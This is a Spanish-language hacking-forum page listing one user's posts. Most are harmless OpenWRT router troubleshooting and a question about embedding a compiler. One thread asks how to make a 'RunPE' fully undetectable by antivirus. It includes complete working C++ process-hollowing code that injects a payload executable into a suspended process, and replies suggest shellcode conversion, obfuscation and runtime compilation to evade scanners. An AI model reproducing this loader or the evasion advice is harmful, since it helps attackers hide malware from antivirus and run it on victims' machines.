Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Z3R0N3

#1
Dudas y pedidos generales / Re:RunPE FUD?¿
Julio 13, 2018, 09:02:24 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

Mira este post:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

GRACIAS POR LEER!!!

¡Gracias por el aporte!
#2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

Te voy a pasar un ejemplo de compilacion on the fly con C# y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No hay muchos lenguajes que soporten esto pero si investigas encontraras.

GRACIAS POR LEER!!!

¡Muy buena info!. He encontrado algo parecido en C++, lo investigaré a ver qué tal funciona. Gracias!
PD: la url=> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#3
Dudas y pedidos generales / Re:RunPE FUD?¿
Julio 13, 2018, 04:07:32 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Runpe fud usa uno hechoen asm lo pasas a shellcode lo limpias y sera fud 100% runtime/scantime forever.

Umm.. creo que entiendo a lo que te refieres.. pero así solo quedaría scantime, ¿no?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

Para mi la mejor manera de ejecutar cosas es con compilacion en runtime. (ejecutar codigo on the fly)

GRACIAS POR LEER!!!

Me gusta, ¿cómo funciona?, si se puede saber... :D
#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No se si entiendo bien la pregunta, pero creo entender que es una aplicación que recoge varios parámetros y con ellos el programa genera un programa que compila y genera un .exe.

Tu problema no todos los compiladores están en la misma ruta, esto la solución es sencilla o que el compilador este en la ruta del PATH o que la ruta sea uno de los parámetros.

Creo que aquí te va a surgir otro problema y es que no todo el mundo tiene el mismos compilador y cada uno de ellos tiene sus propios parámetros, esto la solución es que al tener la ruta ejecutes para ver versión y tu programa sepa poner los parámetros según compilador.

Entiendo, si así es, me pregunto si hay alguna forma de embeber en la aplicación un compilador portable, y en ese caso, cuál y cómo, supongo que tendría que meter las dependencias también en la propia aplicación etc... vaya lio jaja
#5
Dudas y pedidos generales / Re:RunPE FUD?¿
Julio 12, 2018, 04:09:29 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

Los RunPE suelen ser todos bastante parecidos, la forma de hacerlos FUD es usualmente ofuscacion de codigo y modding, la realidad es que no hay muchas maneras distintas de hacer un RunPe, usualmente lo mas comun es que se usen otros metodos para ejecutar programas.

GRACIAS POR LEER!!!

Ok, lo entiendo.

Me parece interesante tu respuesta en especial lo que comentas de otros métodos para ejecutar programas porque abre mucho el hilo. Supongo que te refieres a métodos para ejecutar lo que esté en memoria, ¿verdad? cifrar y descifrar a demanda... etc. Quizás me he ido por las ramas, ¿voy bien?, sería interesante conocer acerca de esto.

Gracias!
#6
Dudas y pedidos generales / RunPE FUD?¿
Julio 11, 2018, 04:57:41 AM
Hola!
Tengo un RunPE genérico (lo pongo más abajo), ¿se os ocurren formas de hacerlo FUD u otra alternativa para lograr lo mismo, por ejemplo trabajando con los fork y pid etc...?
Gracias!

Código: text

/* RunPE */
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
class runPE{
    public:
        void run(LPSTR szFilePath, PVOID pFile)
        {
              PIMAGE_DOS_HEADER IDH;
            PIMAGE_NT_HEADERS INH;
            PIMAGE_SECTION_HEADER ISH;
            PROCESS_INFORMATION PI;
            STARTUPINFOA SI;
            PCONTEXT CTX;
            PDWORD dwImageBase;
            NtUnmapViewOfSection xNtUnmapViewOfSection;
            LPVOID pImageBase;
            int Count;
            IDH = PIMAGE_DOS_HEADER(pFile);
            if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
            {
                INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
                if (INH->Signature == IMAGE_NT_SIGNATURE)
                {
                    RtlZeroMemory(&SI, sizeof(SI));
                    RtlZeroMemory(&PI, sizeof(PI));
                    if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
                    {
                        CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                        CTX->ContextFlags = CONTEXT_FULL;
                        if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                        {
                            ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
                            if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                            {
                                xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                                xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                            }
                            pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
                            if (pImageBase)
                            {
                                WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                                for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                                {
                                    ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                                    WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                                }
                                WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                                CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
                                SetThreadContext(PI.hThread, LPCONTEXT(CTX));
                                ResumeThread(PI.hThread);
                            }
                        }
                    }
                }
            }
            VirtualFree(pFile, 0, MEM_RELEASE);
        }
};
/* end RunPe */


#7
Hola!
Tengo una aplicación que por debajo usa la linea de comandos para pasarle los argumentos al compilador y así generar un .exe (en el caso de windows) ya compilado.
Quiero publicar la aplicación, pero cada persona puede que tenga el compilador en una ruta distinta, entonces me pregunto si hay alguna forma de generar un .exe (o el compilado) desde la propia aplicación sin recurrir al compilador por linea de comandos.
Gracias!


#8
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿As conseguido configurar el router?

Hola!! pues la verdad es que solo conseguí un buen dolor de cabeza y unas buenas ojeras.. he metido el invento en una caja y tengo intención de retomarlo de nuevo cuando vea el problema más claro, por ahora persiste inclusive a veces por TFTP acaba escupiendo direcciones de memoria y reiniciándose.. algo no va bien jaja Gracias por tu seguimiento CRC

En la segunda intentona voy a revisar mejor el firmware original que trae este router, porque pese a que limite la conexión a 1 MB, tenga un servicio corriendo por el puerto 5555 y sea incompatible con la gran mayoria de USBs... él si es capaz de hacer funcionar la red, también buscare esos paquetes que puedan faltar y probar a montar el AP dentro de la misma subnet aunque creo que esto ya lo intenté..
#9
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Supongo que si sabe enviar paquetes hacía fuera tiene que saber entregarlos hacía dentro pero todo es posible. ¿As probado hacer un ping a google a ver si te responde? ¿Que protocolo wifi estas usando en el router principal 802.11 a b g n ac? Si usas el n prueba a usar abg, en esta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta te explica como compilar openwrt. Saludos 

Hola CRC, el ping a google funciona sin pérdida desde el router con open al principal, pero de los clientes conectados a su AP lo hace pero con pérdida.. hasta que satura el router.

Respondiendo a tu pregunta sobre el protocolo del router principal, lanzando el comando "iwconfig wlan0" y entre sus detalles como el bitrate, essid, frecuencia etc... puedo observar esto "IEEE 802.11abgn".

Por cierto, buenísimo el enlace te lo agradezco de verdad además lo tenemos en español ^^. Estoy deseando tener una versión funcional para cocinarme la custom :) Gracias!
#10
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si he entendido bien la interfaz WWAN se conecta al AP del router principal, al cabo de un tiempo se desconecta y no envía más paquetes? Parece que toda la demás configuración esta bien. Me da que va ha ser un problema del drivers de la wifi USB. ¿Sabes el chipset que utiliza el dispositivo? No estoy seguro que con esto se solucione, pero a mí me paso algo parecido tenía instalado el driver Broadcom propietario y tuve que compilar una versión OpenWRT con el modulo brcmsmac. Saludos

Hola CRC, te agradezco a ti también el seguimiento sobre éste asunto.

La interfaz WWAN se crea para gestionar la antena USB que está conectada en modo cliente al router principal, es la interfaz sobre ésta conexión únicamente. (independiente de la interfaz "LAN", que maneja la antena interna AP que tiene el router con OpenWRT).

Se supone que OpenWRT, "maneja" el intercambio de datos entre las dos interfaces ("WAN", "WAN6" y "WWAN" con la interfaz "LAN"), hace de medium... a mi en este caso me da la sensación de que OpenWRT si sabe hacer esto, es decir, os propongo una hipótesis sobre lo que creo que pasa y me decís si tienes sentido...;

- Si tu haces una petición desde el router con OpenWRT, como ya tiene una interfaz conectada en modo cliente no tiene problemas de conexión.. la maneja, la usa.. Pero si tu conectas un cliente al router con OpenWRT y realizas la misma petición... entiendo que los paquetes salen del router con OpenWRT mediante su antena USB (que está conectada al router principal con una IP que le ha dado el DHCP de éste router principal), entonces el paquete llega al router principal... hasta que acaba en su servidor de destino y éste responde... entonces me parece que al responder al router principal, éste no entiende la IP origen (192.168.2.118, cliente del router con OpenWRT) y envía su paquete a todo el broadcast, haciendo que llegue también a la IP de la antena USB (la del modo cliente de OpenWRT ej => 192.168.1.33) y éste también lo envíe a todo su broadcast de la interfaz LAN (la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) haciendo perder parte de los paquetes.... ¿tiene sentido?

Por otro lado, estoy probando el modo cliente al router principal con 2 USBs que traen un chipset RTL8187 (uno es original de Alfa y otro no lo es). De ser asunto del driver... entiendo que tendría que coger el driver original y compilarlo dentro del router con OpenWRT, ¿no? Me gustaría que me dieras más detalles sobre cómo hiciste esto. Muchas Gracias!
#11
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muestra la configurado de las interfaces LAN, WWAN de Openwrt y las interfaces del router principal con los datos de direccionamiento. Puedes hacer todo tipo de cambios en el router principal si tienes algún problema con que le reinicies a estado de fabrica se resetea con la configuración que venia.

Te cuento qué trae OpenWRT por defecto, porque de tantas pruebas que he hecho con el mismo resultado ya no sé cual configuración poner... Si te refieres a los ficheros de configuración u otra cosa dímelo y los pongo por aquí.

Por defecto trae tres interfaces "WAN", "WAN6" y "LAN".

"WAN" y "WAN6" son interfaces que esperan un proveedor de internet tipo IPv4 e IPv6 que se encuentran asociados a unas reglas de firewall llamado "WAN", no tiene IP ni nada por defecto. "LAN" trae una IP 192.168.1.1, con máscara 255.255.255.0 (sin gateway), y ésta interfaz es la que usa OpenWRT para proveer el internet que le llega a él mediante "WAN", "WAN6" o "WWAN" (que se crea posteriormente).

Qué hago yo... pues busco con la antena USB la red wifi del router principal, me conecto a él como cliente y por defecto me crea una nueva interfaz llamada "WWAN", la cual se le puede asignar las reglas del firewall "WAN" o crear unas reglas nuevas.

La interfaz "WWAN" maneja la antena USB en modo cliente que ha obtenido su IP gracias al DHCP del router principal... Pero el router con OpenWRT no tiene conexión, dado que la interfaz "LAN" con IP por defecto 192.168.1.1, hace que reviente la conexión, por tanto para solucionarlo tengo que irme a la interfaz "LAN" y configurarla para que ahora sea "192.168.2.1"... Ahora el router con OpenWRT si tiene conexión, porque no se pegan las interfaces.. me deja hacer "opkg update", instalar otros paquetes y hacer ping sin pérdida etc.

Entonces los clientes que van al router con OpenWRT, reciben una IP del tipo "192.168.2.xxx" y por unos instantes tienen conexión perfecta sin pérdida de paquetes, pero al cabo de un rato los paquetes empiezan a perderse inclusive en ciertas ocasiones el router acaba reiniciándose mostrando un desparrame de direcciones de memoria por TFTP (que es como lo monitoreo...) otras veces si esperas la conexión se estabiliza pero cuando haces otra petición vuelve al bucle...

En otros foros me han recomendado activar la opción "STP" para evitar el Routing Loop en la interfaz de "LAN", pero pese a que lo habilito solo le hace cosquillas...

En la interfaz "LAN" es donde he probado a cambiar el gateway inclusive su propia IP, creo que ésto es una mala práctica que se soluciona con el paquete "relayd", el cuál también he probado en modo "stabridge" entre "LAN" y "WWAN" pero obtiene el mismo resultado... Quizás esto no lo configuro bien, o quizás es el firewall de "WWAN" el que da los problemas.. probé a hacer uno nuevo que no fuese tan restrictivo como el que trae de fábrica.. pero nada.

Lo dicho, si necesitas cualquier otra cosa me dices. Gracias!
#12
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sí me refiero a eso tienes que poner la ip 192.168.1.1 que es la puerta de enlace del router1 ADSL es con el que sales a internet, si tienes en los dos routers activado el servidor dhcp puede que se hagan un lio los dos routers. ¿As probado a configurar un router de forma estática y otro de forma dinámica? ejemplo puedes configurar el router principal ADSL de forma estática y el router Openwrt de forma dinámica. Comentas como te va que me interesa el tema ...

Pues te cuento... jeje Probé eso que me dijiste sin buenos resultados...de hecho, acababa reiniciándose jaja, también quise probar a darle a la interfaz de "LAN" una IP estática del tipo "192.168.1.34" con la puerta de enlace del router principal "192.168.1.1" para ver qué tal respondia... el resultado fué similar, lo mismo si a la interfaz "LAN" le aplicaba como gateway la IP de la antena cliente.

Como estoy pensando en cambiarme de compañía, seguramente me vuelvan a cambiar el router principal y por ello intento evitar tocarlo.. En ambos casos desactivé el DHCP del router con OpenWRT, para ver si éste router principal me daba nuevas direcciones de su DHCP pero no se daba el caso, tenía que poner los clientes que se conectan al AP con OpenWRT con IP fija, sino no obtenían la conexión... al cabo de unos segundos boom de nuevo jaja
#13
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
As probado a cambiar la puerta de enlace del Router con OpenWRT a la dirección del router principal? Si el router principal se encarga de salir a Internet como sabe el router OpenWRT donde tiene que enviar los paquetes para salir hacia fuera? Puede que diga una tontería tampoco me he leído todo el contenido. Saludos

Hola CRC, bienvenido al hilo :)

Creo que entiendo lo que me dices, El router con OpenWRT sabe enviar y recibir paquetes del router principal, pero de los clientes conectados al router con OpenWRT solo sabe enviar los paquetes pero no recibirlos... acaban perdiéndose.

Creo que el router con OpenWRT sabe dónde enviar los paquetes porque tengo una antena puesta en modo cliente al router principal y asociada a la interfaz "WAN" que según entiendo, es la que OpenWRT utiliza como interfaz como proveedor de datos de internet. Luego tiene otra interfaz "LAN" que según entiendo, es la interfaz que OpenWRT utiliza para definir la red de los clientes que se van a conectar a éste router (En mi caso es el AP). Supongo así, que OpenWRT hace el ruteo en medio, entre la "WAN" y la "LAN".

Supongo que te refieres, a que para la interfaz "LAN", pese a que su ip sea 192.168.2.1, ponga el gateway con la IP que provee el router principal por DHCP, ¿Es así?


Por otro lado, siguiendo el tutorial de VLSM de nuestro compañero Cl0udswX, y también el de Subnetting de nuestro compañero también, Expermicid... Estoy llegando a la conclusión, de que si mi antena en modo cliente obtiene una IP por DHCP del router principal, tipo "192.168.1.33" con máscara "255.255.255.0". Entiendo que si quiero usar el router con OpenWRT como AP y servir a los clientes una red del tipo "192.168.2.1", entonces debo declarar en la tabla de rutas del router principal, que esa red "192.168.2.1" existe y la tiene el cliente con ip "192.168.1.33" (el router con OpenWRT)... no sé si estoy en lo cierto.

Si estoy en lo cierto.. entonces sin tocar el router principal, estoy imaginando qué debo hacer para en lugar de montar una red tipo "192.168.2.1-x", hacer que el router con OpenWRT cuando vea que se conecte algún cliente a su AP, entonces le solicite al router principal una IP por DHCP y se la asigne a éste cliente, así éste router con OpenWRT solo se encargue de manejar la conexión de su cliente con el router principal... Algo así jajaj, entiendo que sería como deshabilitar el DHCP del router con OpenWRT, y dejarle esa tarea al router principal...

Ya me decís que opináis de eśte asunto jej, Gracias!

#14
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lo mejor de los problemas es todo lo que se puede aprender de ellos.

Totalmente de acuerdo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Dame lo siguiente:

Direccion IP
Mascara de red
Defaultgateway

Tanto del host como de la interfaz del AP.

Te desgloso lo que me encuentro;

* Router principal ofrece a sus clientes;

Citar
- Direccion IP => 192.168.1.30 - 50
- Mascara de red => 255.255.255.0
- Default gateway => 192.168.1.1

Añado un detalle y es que en la interfaz de luci de OpenWRT, cuando me conecto con el USB como cliente al router principal me crea por defecto la interfaz "wwan" (me permite cambiar de nombre), que lo asocia a la configuración firewall de "WAN" (me permite crear una nueva)


* Router con OpenWRT ofrece a sus clientes;

Citar
- Direccion IP => 192.168.2.150 - 190
- Mascara de red => 255.255.255.0
- Default gateway => 192.168.2.1

El detalle de éste AP, es que por defecto está asociado a la interfaz "LAN".

Creo que es lo que me pides, corrígeme si me equivoco por favor. Gracias!!
#15
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
A ver...

Cuando dices 192.168.1.30/50 entiendo que querras decirme desde la IP .30 hasta la IP .50, lo correcto al poner los rangos es un guion (-) y no una barra (/), me explico: La barra se usa normalmente para indicar cuantos bits son de hosts y cuantos bits son de red, dicho de otra forma es usan forma de saber la mascara de subred.  La idea es saber a que red pertenece una direccion IP en particular y esto se hace haciendo subnetting:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cuantos hablas de subred 1 y subred 2 me imagino que abras hecho subneting de forma correcta...

Verifica y me avisas...

Saludos inmensos.

Hola Cl0udswX, discúlpame el no conocer la nomenclatura correcta en estas situaciones... comprende que no me dedico a ello y se me hace complicado tanto entenderlo como explicarlo al mismo nivel de alguien que tiene este expertise en redes. De igual forma seguimos trabajando en ello y aprendiendo poco a poco gracias a esos aportes como el que me has enviado.

Por otro lado, me dices que pese al cómo quedó la respuesta... entiendes lo que he escrito y solo espero haber respondido a tu pregunta sobre el direccionamiento IP, para así poder continuar buscando la causa y solución a este problema. Sino te pediría por favor que entendieses mi nivel para poder tener comunicación, dado que estoy haciendo todo lo que puedo para ponerme a la altura gracias a tus aportes y los de otros compañeros (de aquí y otros foros), que me están sirviendo como aprendizaje y buena práctica y así comprenderos mejor.

De igual forma pienso aportar todo lo que pueda para dar con la solución. Si necesitas algo más soy todo oídos. Gracias de nuevo.
#16
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mi pregunta va mas dirigida a cual es el rango de direcciones que usan los servicios DHCP (uno en el router principal y el segundo en el AP) ya que lo que comentas puede ser un asunto de Routing_Loop, me explico:

Suponte que los servidores DHCP están asignando la misma dirección a ambos lados del AP, con esto es posible que cuando tu AP haga el enrutamiento encuentre "mas de una coincidencia" con la red de destino, causando que algunos paquetes queden atrapados en un bucle de red y cuando se agote el TTL (TimeToLive) el paquete se descarta.

Tienes una buena oportunidad de aprender en esa situación, mi recomendación es que te instales wireshark y monitorear los paquetes, analiza sus cabeceras, también verifica los logs en el AP.

Saludos y cualquier cosa nos comentas.

Llevas razón, lo considero muy buena oportunidad de aprendizaje pese (o gracias) a los cabezazos que me estoy dando contra la pared jajaj (y vuestra ayuda claro)

He instalado wireshark y bueno, si tenéis algún enlace con algún tutorial que me ayude a entender la herramienta genial, por mi cuenta investigaré cómo funciona e intentaré interpretar lo que me vaya encontrando para conseguir entender qué puede estar sucediendo y cómo solventarlo.

Por otro lado te respondo a lo del rango de direcciones... El USB que pongo en modo cliente, se conecta a un router principal que le provee un DHCP comprendido entre la IP 192.168.1.30/50 (subred 1). Mientras que la antena interna del router con OpenWRT que hace de AP, provee un DHCP a sus clientes comprendido entre la IP 192.168.2.150/170 (subred 2).

Ayer, Hice las pruebas estableciendo IP fija en la antena que hace de modo cliente (el USB), después deshabilité el DHCP de "lan" que reparte la antena interna en modo AP y me conecté a ella con un equipo mediante IP fija también.

En la prueba además de establecer las direcciones fijas, me basé en hacer un ping contínuo en el router con OpenWRT y éste daba entre 6 y 12 ms... Conecté un equipo a la antena en modo AP y seguía con ese ratio de TTL, pero en el momento de hacer una petición HTTP con el navegador del equipo conectado al AP, el TTL del router (que seguía haciendo ping...) subió a 2000-2500 ms... al rato bajaba estabilizándose pero con pérdida.

Tras probar a instalar paquetes como "relayd" y "qos" inclusive habilitarlos al inicio el resultado es similar, entiendo que estos paquetes no sirvieron.

Bueno, seguimos en ello.. cualquier cosa más me será de gran ayuda, gracias!
#17
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como has hecho el direccionamiento IP?

En la pc...
En la interfaz de la antena...

Saludos.

Hola Cl0udswX.

La antena USB que actúa en modo cliente al router principal usa DHCP (si le indico IP Fija y pongo las DNS de google la latencia de ping disminuye considerablemente). Ésta interfaz la asocio en LUCi o por comandos a la interfaz WAN o WWAN.

La antena interna que hace de AP, provee el DHCP a sus clientes, que al conectarse alguno de ellos es cuando empieza la pérdida de paquetes (no tengo muy claro si la pérdida de paquetes y conexión es justo al conectarse o cuando empiezo a hacer conexiónes HTTP por el puerto 80). En la configuración de interfaz la marco como LAN.

Creo que te refieres a esto.
#18
Hola,

He instalado "OpenWRT" en mi router "Alfa R36 AIP w502u". Por cierto, la descarga sigue estando en la versión 12, me parece que ya estamos en la versión 15...

El Router tiene 1 antena, y 1 USB.

1 - Configuro la antena en modo cliente, para poder hacer "opkg update" y después "opkg install kmod-rtl8187" para obtener el driver USB.

2 - Uso el comando "wifi detect > /etc/config/wireless" para actualizar la información de la nueva antena conectada por USB.

3 - Pongo la antena 1 en modo AP asociado a "LAN", y la antena 2 en modo cliente asociado a "WAN" o "WWAN" si no deseo las reglas firewall que trae "WAN" por defecto.

4 - Realizo una prueba de ping desde el router, todo OK.

5 - Conecto un PC a la antena que está en modo AP, hago ping y más del 33% de los paquetes se pierden.

6 - Vuelvo a realizar la prueba del punto 4, y ahora el router también pierde los paquetes.

¿Qué puede estar sucediendo? ¿Me falta algún paquete? ¿Alguna regla de firewall mal configurada? ¿Debo crear alguna VLAN? ¿Debo esperar una nueva actualización de firmware?

No entiendo mucho de redes, pero me manejo bastante bien con Linux.

Espero alguna respuesta. Gracias!
#19
Hola! alguien más me puede ayudar? :(
#20
Hola de nuevo.

Tras realizar unas pruebas de configuración en la interfaz web de OpenWRT. Llegué a la conclusión de que nada más encender el router, la conexión es perfecta desde éste, al otro router que le provee internet. Pero en el momento en el que conecto algún cliente al router con OpenWRT, éste empieza a saturarse y a perder paquetes, tanto para el router como para los clientes conectados a él.

No entiendo muy bien porqué puede suceder ésto. Alguien sabría decirme como podría configurarlo? Creo que el problema lo tengo con el table routes, con el firewall o quizás incluso tenga que realizar una VLAN que conecte las dos interfaces (LAN para los clientes conectados al router con openwrt, y WAN para la antena que se conecta al router que provee la conexión). No lo sé muy bien.